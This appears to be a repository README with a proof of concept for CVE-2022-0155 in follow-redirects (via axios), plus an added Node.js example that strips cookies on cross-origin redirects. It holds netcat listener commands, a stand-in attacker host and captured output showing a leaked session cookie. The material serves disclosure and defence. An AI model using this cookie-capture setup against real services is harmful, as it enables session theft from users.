coana-tech/CVE-2022-0155-PoC
CVE-2022-0155 Proof-of-Concept (PoC)

This repository contains a demonstration of the CVE-2022-0155 vulnerability. The vulnerability was detected by ranjit-git and is described in detail here. The purpose of this PoC is to demonstrate that the vulnerability doesn't just apply to scenarios where follow-redirects is used as a direct dependency, but also when follow-redirects is pulled in as an indirect (transitive) dependency through axios.

Overview

The vulnerability affects the follow-redirects npm package prior to version 1.14.7. follow-redirects extends Node.js's built-in HTTP module with the ability to follow redirects automatically.

To demonstrate the vulnerability, consider the following scenario:

  1. follow-redirects is used to send a GET request to https://example.com.
  2. https://example.com replies with a 3xx response code requesting a redirect to https://attackers-webserver.com.
  3. follow-redirects then sends a GET request to https://attackers-webserver.com.

The vulnerability lies in step 3: vulnerable versions of follow-redirects include the same Cookie header in the redirected request as in the request from step 1, even though the target is now a different host. This allows https://attackers-webserver.com to capture, for example, the user's session ID for https://example.com and gain access to the user's data.

The attack depends on the attacker's ability to control the redirect to https://attackers-webserver.com. In the PoC, an Express server is used to emulate the behavior of https://example.com. The server has a single GET API endpoint '/redirect', which redirects the client to the URL provided as a parameter. This emulates a scenario where the attacker can control the URL the client is redirected to.
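The check that closes this gap, written here as an added example in plain Node.js (it is not code from follow-redirects or from this repository): when the redirect target's origin differs from the original request's, the Cookie and Authorization headers are dropped before the follow-up request is built. The function name `buildRedirectHeaders` and the sample headers are assumptions for illustration.

```javascript
// Added example: drop credentials when a redirect crosses to another origin.
// Not code from follow-redirects or this PoC; names are illustrative.

// Headers that must never be carried over to a different origin on a redirect.
const SENSITIVE_HEADERS = ["cookie", "authorization"];

// Return a copy of `headers` suitable for the follow-up request to `redirectUrl`.
// If the redirect leaves the original origin (scheme, host or port changes),
// the sensitive headers are removed; same-origin redirects keep them.
function buildRedirectHeaders(originalUrl, redirectUrl, headers) {
  const from = new URL(originalUrl);
  // A Location header may be relative; resolve it against the original URL.
  const to = new URL(redirectUrl, originalUrl);
  const sameOrigin = from.protocol === to.protocol && from.host === to.host;

  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!sameOrigin && SENSITIVE_HEADERS.includes(name.toLowerCase())) continue;
    out[name] = value;
  }
  // The Host header must always reflect the new target, never the old one.
  out.Host = to.host;
  return out;
}

// Constructed sample mirroring the PoC: a request to the example.com stand-in
// carrying a session cookie, then a 3xx pointing at the attacker's listener.
const sampleHeaders = {
  Accept: "application/json, text/plain, */*",
  Cookie: "session=some-secret-value",
  "User-Agent": "axios/0.21.4",
  Host: "example.com",
};

// Cross-origin redirect: Cookie is stripped, Host is rewritten.
console.log(buildRedirectHeaders("https://example.com/redirect",
  "http://localhost:8182/", sampleHeaders));
// Same-origin redirect: Cookie is kept.
console.log(buildRedirectHeaders("https://example.com/redirect",
  "/other", sampleHeaders));
```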

PoC

npm install
node express-server.js
nc -l -v 8182 # or nc -lnvp 8182 on non-mac systems
node client.js

You should see the terminal containing nc print this output:

GET / HTTP/1.1
Accept: application/json, text/plain, */*
Cookie: session=some-secret-value
User-Agent: axios/0.21.4
Host: localhost:8182
Connection: keep-alive

The vulnerability is illustrated by the presence of the Cookie header in the nc terminal: the cookie was set for the Express server (standing in for https://example.com), yet it arrives at the nc (Netcat) listener, which represents the attacker's web server.
